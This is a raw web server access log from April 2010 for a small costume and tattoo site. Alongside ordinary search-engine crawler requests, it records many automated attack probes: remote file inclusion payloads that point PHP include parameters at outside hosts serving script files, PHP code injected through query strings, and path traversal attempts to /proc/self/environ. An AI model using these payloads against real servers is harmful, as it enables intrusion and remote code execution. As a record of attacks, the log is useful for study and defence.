94.75.229.132 - - [19/Apr/2010:22:43:15 -0500] "GET /artwork/furniture-misc.htm HTTP/1.1" 200 1977 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:15 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3962 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:16 -0500] "GET /logs/?D=D HTTP/1.1" 200 2456 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:16 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3851 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:16 -0500] "GET /costume/thmb6.htm HTTP/1.1" 200 3210 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:16 -0500] "GET /costume/thmb8.htm HTTP/1.1" 200 3054 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:17 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:17 -0500] "GET /artwork/flagart.htm HTTP/1.1" 200 923 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:17 -0500] "GET /artwork/trunks.htm HTTP/1.1" 200 1275 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:18 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:18 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:18 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:18 -0500] "GET /costume/thmb3.htm HTTP/1.1" 200 3450 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:19 -0500] "GET /costume/cd-page1.htm HTTP/1.1" 200 1189 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:19 -0500] "GET /costume/shipping.htm HTTP/1.1" 404 304 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:19 -0500] "GET /logs/?N=A HTTP/1.1" 200 2456 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
94.75.229.132 - - [19/Apr/2010:22:43:20 -0500] "GET /costume/thmb7.htm HTTP/1.1" 200 2938 "-""Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)"
87.250.255.243 - - [19/Apr/2010:22:43:43 -0500] "GET /logs/access_log.1214524800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [19/Apr/2010:22:44:20 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.222.152.66 - - [19/Apr/2010:22:44:20 -0500] "GET /logs/access_log.1270598400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.222.152.66 - - [19/Apr/2010:22:44:20 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
202.67.9.202 - - [19/Apr/2010:22:44:25 -0500] "GET /logs/access_log.1266278400//estrutura/enquetes/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.foodntop.com/bbs/icon/LC1? HTTP/1.1" 404 343 "-""Mozilla/5.0"
202.67.9.202 - - [19/Apr/2010:22:44:25 -0500] "GET //estrutura/enquetes/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.foodntop.com/bbs/icon/LC1? HTTP/1.1" 404 316 "-""Mozilla/5.0"
202.67.9.202 - - [19/Apr/2010:22:44:25 -0500] "GET /logs/access_log.1265673600//estrutura/enquetes/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.foodntop.com/bbs/icon/LC1? HTTP/1.1" 404 343 "-""Mozilla/5.0"
202.67.9.202 - - [19/Apr/2010:22:44:26 -0500] "GET /logs//estrutura/enquetes/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.foodntop.com/bbs/icon/LC1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.249.71.225 - - [19/Apr/2010:22:48:49 -0500] "GET /logs/access_log.1226793600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.250.255.243 - - [19/Apr/2010:22:49:14 -0500] "GET /logs/access_log.1271030400 HTTP/1.1" 200 643402 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [19/Apr/2010:22:52:52 -0500] "GET /logs/access_log.1227484800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.235.124.15 - - [19/Apr/2010:22:53:24 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
207.46.199.179 - - [19/Apr/2010:22:53:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/Apr/2010:22:58:18 -0500] "GET /logs/access_log.1215302400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.40 - - [19/Apr/2010:22:58:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.40 - - [19/Apr/2010:22:59:55 -0500] "GET /logs/access_log.1189900800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.235.124.76 - - [19/Apr/2010:23:00:05 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.0" 200 3254 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
87.250.255.243 - - [19/Apr/2010:23:02:50 -0500] "GET /logs/access_log.1210550400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [19/Apr/2010:23:10:05 -0500] "GET /logs/access_log.1172793600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
200.54.72.148 - - [19/Apr/2010:23:14:20 -0500] "GET /?custompluginfile%5B%5D=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
200.54.72.148 - - [19/Apr/2010:23:14:22 -0500] "GET /logs/?custompluginfile%5B%5D=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt? HTTP/1.1" 200 2456 "-""Mozilla/5.0"
200.54.72.148 - - [19/Apr/2010:23:14:22 -0500] "GET /logs/access_log.1212969600%20%20/?custompluginfile%5B%5D=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:23:15:31 -0500] "GET /logs/access_log.1240099200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
217.73.226.225 - - [19/Apr/2010:23:18:08 -0500] "GET /arif? HTTP/1.1" 404 288 "-""libwww-perl/5.805"
217.73.226.225 - - [19/Apr/2010:23:19:05 -0500] "GET /logs/access_log.1268956800/arif? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
217.73.226.225 - - [19/Apr/2010:23:19:05 -0500] "GET /arif? HTTP/1.1" 404 288 "-""libwww-perl/5.805"
217.73.226.225 - - [19/Apr/2010:23:19:05 -0500] "GET /logs/arif? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
200.54.72.148 - - [19/Apr/2010:23:19:53 -0500] "GET /logs/access_log.1212969600%20%20/?custompluginfile%5B%5D=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
200.54.72.148 - - [19/Apr/2010:23:19:53 -0500] "GET /?custompluginfile%5B%5D=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
200.54.72.148 - - [19/Apr/2010:23:19:53 -0500] "GET /logs/?custompluginfile%5B%5D=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt? HTTP/1.1" 200 2456 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:23:20:02 -0500] "GET /logs/access_log.1224374400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [19/Apr/2010:23:26:23 -0500] "GET /logs/access_log.1155513600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.45 - - [19/Apr/2010:23:29:27 -0500] "GET /costume/thmb9.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [19/Apr/2010:23:30:18 -0500] "GET /logs/access_log.1258416000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [19/Apr/2010:23:30:56 -0500] "GET /logs/access_log.1249257600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.249.71.225 - - [19/Apr/2010:23:32:53 -0500] "GET /logs/access_log.1225756800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.199.51 - - [19/Apr/2010:23:32:56 -0500] "GET /logs/access_log.1175817600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.216.43.133 - - [19/Apr/2010:23:36:09 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:23:36:12 -0500] "GET /logs/access_log.1219363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:23:36:12 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:23:36:20 -0500] "GET /logs/access_log.1219363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:23:36:20 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:23:36:20 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
200.54.72.148 - - [19/Apr/2010:23:37:06 -0500] "GET /logs/access_log.1212969600/?custompluginfile%5B%5D=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:23:37:17 -0500] "GET /logs/access_log.1239753600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
200.54.72.148 - - [19/Apr/2010:23:37:55 -0500] "GET /logs/access_log.1223164800/?custompluginfile%5B%5D=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.54.72.148 - - [19/Apr/2010:23:38:29 -0500] "GET /logs/access_log.1212969600/?custompluginfile%5B%5D=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.54.72.148 - - [19/Apr/2010:23:41:02 -0500] "GET /logs/access_log.1219708800/?custompluginfile%5B%5D=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.54.72.148 - - [19/Apr/2010:23:41:39 -0500] "GET /logs/access_log.1219708800/?custompluginfile%5B%5D=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:23:43:35 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:23:43:35 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:23:43:35 -0500] "GET /?INCLUDE_FOLDER=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:23:43:35 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 200 2456 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:23:43:35 -0500] "GET /?INCLUDE_FOLDER=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:23:43:35 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 200 2456 "-""Mozilla/5.0"
220.232.195.131 - - [19/Apr/2010:23:43:41 -0500] "GET /logs/index.php?option=com_tweetla&controller=./../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
220.232.195.131 - - [19/Apr/2010:23:43:41 -0500] "GET /logs/index.php?option=com_tweetla&controller=./../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""-"
220.232.195.131 - - [19/Apr/2010:23:43:42 -0500] "GET /index.php?option=com_tweetla&controller=./../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
220.232.195.131 - - [19/Apr/2010:23:43:43 -0500] "GET /index.php?option=com_tweetla&controller=./../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""-"
64.113.184.23 - - [19/Apr/2010:23:43:43 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:23:43:43 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 200 2456 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:23:43:43 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:23:43:43 -0500] "GET /?INCLUDE_FOLDER=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:23:43:43 -0500] "GET /?INCLUDE_FOLDER=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:23:43:43 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:23:43:44 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 200 2456 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:23:43:44 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:23:43:49 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:23:43:51 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:23:44:32 -0500] "GET /logs/access_log.1222560000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.46.157.102 - - [19/Apr/2010:23:46:26 -0500] "GET /logs/access_log.1219363200%20%20/errors.php?error=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.46.157.102 - - [19/Apr/2010:23:46:26 -0500] "GET /errors.php?error=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
72.46.157.102 - - [19/Apr/2010:23:46:26 -0500] "GET /logs/errors.php?error=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.82.117.81 - - [19/Apr/2010:23:46:42 -0500] "GET //Neos_Chronos/header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
208.82.117.81 - - [19/Apr/2010:23:46:42 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
208.82.117.81 - - [19/Apr/2010:23:46:42 -0500] "GET /logs/access_log.1268956800%20%20//Neos_Chronos/header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
79.98.23.9 - - [19/Apr/2010:23:47:01 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
79.98.23.9 - - [19/Apr/2010:23:47:01 -0500] "GET //Neos_Chronos/header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
79.98.23.9 - - [19/Apr/2010:23:47:01 -0500] "GET /logs/access_log.1268956800%20%20//Neos_Chronos/header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
208.82.117.81 - - [19/Apr/2010:23:47:30 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
208.82.117.81 - - [19/Apr/2010:23:47:30 -0500] "GET /logs/access_log.1208044800//Neos_Chronos/header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
208.82.117.81 - - [19/Apr/2010:23:47:30 -0500] "GET //Neos_Chronos/header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
208.82.117.81 - - [19/Apr/2010:23:47:51 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
208.82.117.81 - - [19/Apr/2010:23:47:51 -0500] "GET /logs/access_log.1268956800//Neos_Chronos/header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
208.82.117.81 - - [19/Apr/2010:23:47:51 -0500] "GET //Neos_Chronos/header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:23:50:54 -0500] "GET /logs/access_log.1229472000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
164.115.5.63 - - [19/Apr/2010:23:51:53 -0500] "GET /logs//bbs/skin/ggambo7002_board//delete_all.php?dir=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.0" 404 319 "-""Mozilla/5.0"
164.115.5.63 - - [19/Apr/2010:23:51:53 -0500] "GET //bbs/skin/ggambo7002_board//delete_all.php?dir=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.0" 404 314 "-""Mozilla/5.0"
164.115.5.63 - - [19/Apr/2010:23:51:53 -0500] "GET /logs/access_log.1265760000//bbs/skin/ggambo7002_board//delete_all.php?dir=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.0" 404 341 "-""Mozilla/5.0"
208.82.117.81 - - [19/Apr/2010:23:52:27 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
208.82.117.81 - - [19/Apr/2010:23:52:27 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
208.82.117.81 - - [19/Apr/2010:23:52:27 -0500] "GET /logs/access_log.1219622400//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0"
164.115.5.63 - - [19/Apr/2010:23:52:38 -0500] "GET /logs//bbs/skin/ggambo7002_board//delete_all.php?dir=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.0" 404 319 "-""Mozilla/5.0"
164.115.5.63 - - [19/Apr/2010:23:52:43 -0500] "GET /logs/access_log.1265760000//bbs/skin/ggambo7002_board//delete_all.php?dir=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.0" 404 341 "-""Mozilla/5.0"
164.115.5.63 - - [19/Apr/2010:23:52:43 -0500] "GET //bbs/skin/ggambo7002_board//delete_all.php?dir=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.0" 404 314 "-""Mozilla/5.0"
72.46.157.102 - - [19/Apr/2010:23:54:35 -0500] "GET /logs/access_log.1219363200/errors.php?error=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.82.117.81 - - [19/Apr/2010:23:54:43 -0500] "GET /logs/access_log.1215734400//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0"
66.249.71.225 - - [19/Apr/2010:23:54:49 -0500] "GET /logs/access_log.1216339200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.250.255.243 - - [19/Apr/2010:23:56:22 -0500] "GET /logs/access_log.1235001600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
209.216.43.133 - - [19/Apr/2010:23:56:53 -0500] "GET /logs/access_log.1219708800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:23:57:03 -0500] "GET /logs/access_log.1219708800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kumcalb.org///g4/adm/img/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.195.112.180 - - [19/Apr/2010:23:57:51 -0500] "GET /logs/access_log.1271203200 HTTP/1.0" 200 497444 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.82.117.81 - - [20/Apr/2010:00:01:13 -0500] "GET /logs/access_log.1219363200//components/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
208.82.117.81 - - [20/Apr/2010:00:01:13 -0500] "GET //components/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
208.82.117.81 - - [20/Apr/2010:00:01:13 -0500] "GET /logs//components/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
208.82.117.81 - - [20/Apr/2010:00:01:32 -0500] "GET /logs/access_log.1219363200%20%20//components/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
208.82.117.81 - - [20/Apr/2010:00:01:59 -0500] "GET /logs/access_log.1268611200%20%20//components/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
208.82.117.81 - - [20/Apr/2010:00:02:21 -0500] "GET /logs/access_log.1268265600%20%20//components/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
208.82.117.81 - - [20/Apr/2010:00:02:21 -0500] "GET /logs/access_log.1267920000%20%20//components/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:00:02:42 -0500] "GET /logs/access_log.1185926400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.82.117.81 - - [20/Apr/2010:00:04:52 -0500] "GET /logs/access_log.1268611200//components/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
207.46.199.191 - - [20/Apr/2010:00:08:00 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:00:09:06 -0500] "GET /logs/access_log.1242604800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [20/Apr/2010:00:09:21 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:00:09:21 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:00:09:21 -0500] "GET /logs/access_log.1220054400%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:00:09:23 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:00:09:23 -0500] "GET /logs/access_log.1220054400%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:00:09:23 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.176.226.170 - - [20/Apr/2010:00:12:10 -0500] "GET ///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.nmnudegirls.com/asu/includes/f1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
81.176.226.170 - - [20/Apr/2010:00:12:10 -0500] "GET /logs/access_log.1268265600%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.nmnudegirls.com/asu/includes/f1.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
